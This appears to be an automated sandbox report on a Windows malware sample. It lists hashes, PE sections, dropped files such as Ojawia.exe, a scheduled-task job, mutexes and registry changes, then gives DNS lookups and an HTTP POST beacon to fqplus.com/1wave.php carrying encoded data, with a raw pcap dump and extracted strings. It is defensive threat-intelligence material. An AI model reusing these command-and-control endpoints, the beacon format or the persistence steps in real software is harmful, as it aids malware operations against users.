Analysis Date2014-10-06 07:55:12
MD5034b76acccfe6cf7124b814735182991
SHA162d0b0b3344472bda25b9920747be1998f38bd0a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionCODE md5: fcb2d27e2424170b597f67d43d30d3ef sha1: a7f911cfbcc3144d88ee0d7ed3dd8046ead60ffe size: 14848
SectionDATA md5: e781d687eb43e070fe5e0069b9d93498 sha1: d8948f3fc9e2071e093b26ce36a98198de4e1780 size: 142848
SectionBSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: 54ffa307db20bd448119507254ab13e6 sha1: c1fcfe734c5687313bbd942f3a11fe7aa1dbb266 size: 3072
Section.reloc md5: 8b59b928391e05d8198fb7f94a4bdd27 sha1: 12b1560795385c7e54de2d263203d3834d6415b4 size: 1024
Section.rsrc md5: 4439c3a4a132c10209cc66afe16918ea sha1: f0e92495d9513406dca96f39209a30dcd9b6acb0 size: 1024
Timestamp1992-06-19 22:22:17
PEhash9595ca0c2b8b8c81bca5abd76bd3dde1c6a6223c
IMPhashc026b969030c0f9a87fb6d5cce0ff1c3

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\WINDOWS\Ojawia.exe
Creates FileC:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates FilePIPE\lsarpc
Creates ProcessC:\WINDOWS\Ojawia.exe
Creates MutexGlobal\{BC9BACEF-649A-45ff-A468-C000D051F283}

Process
↳ C:\WINDOWS\Ojawia.exe

RegistryHKEY_CURRENT_USER\Software\K8CE6CA1JO\OhuD ➝
5
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
Creates FileC:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates MutexGlobal\{BC9BACEF-649A-45ff-A468-C000D051F283}

Network Details:

DNSning.com
Type: A
208.82.16.81
DNSkaskus.us
Type: A
192.31.186.4
DNSfqplus.com
Type: A
184.168.192.6
DNStesyeux.com
Type: A
DNSiufaculty.com
Type: A
HTTP POSThttp://fqplus.com/1wave.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 184.168.192.6:80

Raw Pcap
0x00000000 (00000)   504f5354 202f3177 6176652e 70687020   POST /1wave.php 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a43 6f6e7465 6e742d54   : */*..Content-T
0x00000030 (00048)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000040 (00064)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000050 (00080)   6e636f64 65640d0a 486f7374 3a206671   ncoded..Host: fq
0x00000060 (00096)   706c7573 2e636f6d 0d0a5573 65722d41   plus.com..User-A
0x00000070 (00112)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000080 (00128)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000090 (00144)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000a0 (00160)   204e5420 352e3029 0d0a436f 6e74656e    NT 5.0)..Conten
0x000000b0 (00176)   742d4c65 6e677468 3a203330 350d0a43   t-Length: 305..C
0x000000c0 (00192)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x000000d0 (00208)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000e0 (00224)   206e6f2d 63616368 650d0a0d 0a646174    no-cache....dat
0x000000f0 (00240)   613d652f 65367235 4a5a5231 30466977   a=e/e6r5JZR10Fiw
0x00000100 (00256)   6f474c67 35315167 4339686e 6245786f   oGLg51QgC9hnbExo
0x00000110 (00272)   32316174 33614f59 6773552f 484c6b7a   21at3aOYgsU/HLkz
0x00000120 (00288)   66336375 77704474 52737935 2b65305a   f3cuwpDtRsy5+e0Z
0x00000130 (00304)   5a523733 6c455878 7a38547a 5a663678   ZR73lEXxz8TzZf6x
0x00000140 (00320)   33306564 63736477 4d4a4f64 41462f56   30edcsdwMJOdAF/V
0x00000150 (00336)   6a567357 48463045 79377a44 4a57392f   jVsWHF0Ey7zDJW9/
0x00000160 (00352)   73394a45 724a3070 66723832 51593662   s9JErJ0pfr82QY6b
0x00000170 (00368)   38484367 53754e61 55716967 346f5633   8HCgSuNaUqig4oV3
0x00000180 (00384)   4242774b 3274327a 37335247 65795544   BBwK2t2z73RGeyUD
0x00000190 (00400)   6a677375 48467043 4c4f696b 5250534c   jgsuHFpCLOikRPSL
0x000001a0 (00416)   39536a75 50314942 38624b70 6a746d4a   9SjuP1IB8bKpjtmJ
0x000001b0 (00432)   30696733 566d5663 4638616f 4f724252   0ig3VmVcF8aoOrBR
0x000001c0 (00448)   52437964 624b5067 4f69452f 6b7a6a67   RCydbKPgOiE/kzjg
0x000001d0 (00464)   4d764145 436d5643 62664b72 4e653657   MvAECmVCbfKrNe6W
0x000001e0 (00480)   6c486768 6b45546a 2f6b4776 38463630   lHghkETj/kGv8F60
0x000001f0 (00496)   5552444d 50686e34 70644941 44714678   URDMPhn4pdIADqFx
0x00000200 (00512)   42482f34 66663845 72776a6c 32555977   BH/4ff8Erwjl2UYw
0x00000210 (00528)   536c6572 34444378 3431415a 3450       Sler4DCx41AZ4P


Strings
v.
\
.6AU!9a&w
..ir...S..=..&..
XT
x.^D.+V..I
7:9
...
p...U.
...

0+t"
1>}=
1D_d
2z0v
3Dm/
*4>D
4iFU@i
5@^f[p?
~6'a
'8O/
A`Fo
\]aNr
Axq_6
"^b3
Et:#
~<eW
}H~\
I)3Z
>J<E
!.jg
k^NV
k}VfN
lMp@
&=lR]
NA&4
O)_8
OmQ2
o,>oI
(PK8
>Q32
ss`R
TG{'
TmqT
'UpO
~w'B
WWFg
x4#$
/@YH
|z.0
*Z@t
12d9a3ea
2"2*222:2B2J2R2Z2b2j2r2z2
3%3+31373=3C3I3O3U3[3a3g3m3s3y3
3&3.363>3F3N3V3^3f3n3v3~3
4!4'4-43494?4E4K4Q4W4]4c4i4o4u4{4
4&4.464>4F4N4V4^4f4n4v4~4
9&9-949<9C9X9,:3:{<
9F<P<q=
9+q;1A
AppCompat_RunDLLW
  </application> 
  <application> 
AQj,s?
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Windows Setup UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
B4:u(y
@BJ;m,w	
CallNamedPipeA
ChildWindowFromPoint
ChooseFontA
CoCreateFreeThreadedMarshaler
CoGetTreatAsClass
CoInitialize
comdlg32.dll
CommDlgExtendedError
CommitSpoolData
CompareFileTime
</compatibility> 
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> 
CopyFileExA
CopyFileExW
CoQueryReleaseObject
CreateHardLinkW
CreateWindowExA
DefFrameProcW
DeletePrintProvidorW
DestroyCaret
DEVICECAPABILITIES
DevQueryPrintEx
DllGetVersion
DragQueryFileW
Em*3)E
EqualRect
EXTDEVICEMODE
FlushConsoleInputBuffer
freeaddrinfo
GetClassWord
GetEnvironmentVariableA
GetFileTitleW
GetHGlobalFromILockBytes
GetOpenFileNameA
GetOpenFileNameW
GetProcAddress
GetSaveFileNameW
GetSystemDefaultLCID
GetWindowTextA
GetWindowThreadProcessId
Gjl(V.
ICJI9-
.idata
InflateRect
InternalExtractIconListW
IntersectRect
IsValidInterface
kernel32.dll
KKGJ;E
LoadLibraryA
LoadLibraryExA
LocalAlloc
LocalFree
'{m+,,,
M0W0`0f0l0
OffsetRect
ole32.dll
OleCreateLinkFromData
OleDuplicateData
OleIsCurrentClipboard
OpenAs_RunDLL
Options_RunDLLA
PageSetupDlgW
PathAddBackslashA
PathCanonicalizeW
PathCompactPathExA
PathFindFileNameW
PathFindOnPathW
PathIsSameRootA
PrintDlgExA
PrintDlgW
:\}p rnW
P.rsrc
PtInRect
`q`-I	
Qt,ZD-
RealShellExecuteW
regapi
.reloc
ReplaceTextW
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
      </security>
      <security>
SetLocaleInfoW
SetPortA
SetWindowTextA
SHBrowseForFolder
SHBrowseForFolderW
SHChangeNotifySuspendResume
SHCreateLocalServerRunDll
shell32.dll
SHFreeNameMappings
SHGetSpecialFolderPathA
SHGetThreadRef
SHInvokePrinterCommandW
shlwapi.dll
SHOpenRegStreamA
SHPathPrepareForWriteA
SHRegGetPathW
SHRegQueryInfoUSKeyW
SHStrDupA
StrCatBuffA
StrCmpNW
StrCpyW
StringX
StrRChrIA
StrRStrIA
StrStrNW
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> 
      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> 
?(?S?Z?o?
)=t,,,
{+t|cc
    <!--The ID below indicates application support for Windows 7 --> 
    <!--The ID below indicates application support for Windows Vista --> 
This program must be run under Win32
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
UnionRect
UrlApplySchemeA
UrlCreateFromPathA
user32.dll
VirtualAllocEx
VirtualFree
VirtualProtect
WantArrows
WindowFromPoint
winspool.drv
WriteFileEx
ws2_32.dll
WSAAddressToStringW
WSAEnumProtocolsW
WSAInstallServiceClassA
WSAJoinLeaf
WSANtohs
WSASendDisconnect
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
Y+jKr	;